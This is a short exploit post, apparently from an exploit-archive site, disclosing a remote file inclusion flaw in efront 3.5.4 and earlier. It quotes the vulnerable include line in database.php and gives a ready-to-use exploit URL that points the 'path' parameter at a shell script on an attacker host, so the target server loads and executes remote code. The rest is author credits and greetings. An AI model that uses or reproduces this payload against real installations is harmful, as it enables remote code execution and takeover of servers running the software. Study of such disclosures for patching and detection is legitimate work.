[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability
# Published : 2009-09-15
# Author : cr4wl3r
# Previous Title : HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
# Next Title : iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability
########################################################################
#efront <= 3.5.4 Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/efrontlearning/files/
#Author : cr4wl3r
#Contact : cr4wl3r[4t]linuxmail[dot]org
#Location : Gorontalo - INDONESIA
########################################################################
#file :
# database.php
#line 15 require_once($path.'adodb/adodb.inc.php');
########################################################################
#3xplo!t :
#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt???
########################################################################
#Greetz : MyMom [alm]
#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################
# www.Syue.com [2009-09-15]